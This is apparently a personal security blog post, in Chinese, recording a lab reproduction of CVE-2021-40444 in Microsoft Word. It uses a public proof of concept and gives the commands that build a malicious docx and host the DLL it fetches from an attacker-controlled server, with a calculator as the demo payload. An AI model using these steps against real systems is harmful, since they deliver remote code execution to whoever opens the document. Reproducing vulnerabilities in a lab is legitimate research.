侧边栏壁纸
博主头像
Tess-Wiki 博主等级

世间万般兵刃,唯有过往伤人最深。

  • 累计撰写 200 篇文章
  • 累计创建 1 个标签
  • 累计收到 46 条评论

目 录CONTENT

文章目录
漏洞复现

CVE-2021-40444(Microsoft Office Word 远程执行代码)弹计算器复现过程中的问题

Administrator
Administrator
2023-10-21 / 0 评论 / 0 点赞 / 11 阅读 / 0 字

github项目地址:https://github.com/lockedbyte/CVE-2021-40444

环境准备

系统版本

d2b5ca33bd052422

ie版本

d2b5ca33bd052435

插件设置

d2b5ca33bd052516

d2b5ca33bd052529

d2b5ca33bd052553

word版本

d2b5ca33bd052606

d2b5ca33bd052615

开始复现

在服务器 git clone https://github.com/lockedbyte/CVE-2021-40444.git

然后安装 apt-get install lcab

还要安装 unzip

首先生成一个给定 DLL 的恶意 docx 文档,使用test/calc.dll弹出的文档calc.exesystem()

d2b5ca33bd052638

python3 exploit.py generate test/calc.dll http://服务器IP

d2b5ca33bd052653

把/out目录下生成的document.docx文档下载到虚拟机上

服务器开启监听python3 exploit.py host 80

在虚拟机中打开文件

d2b5ca33bd052707

服务器端收到请求

d2b5ca33bd052717

 

-.-

0
版权归属: Administrator
本文链接: https://tess.ink/archives/CVE-2021-40444%EF%BC%88Microsoft%20Office%20Word%20%E8%BF%9C%E7%A8%8B%E6%89%A7%E8%A1%8C%E4%BB%A3%E7%A0%81%EF%BC%89%E5%BC%B9%E8%AE%A1%E7%AE%97%E5%99%A8%E5%A4%8D%E7%8E%B0%E8%BF%87%E7%A8%8B%E4%B8%AD%E7%9A%84%E9%97%AE%E9%A2%98
许可协议: 本文使用《署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)》协议授权

评论区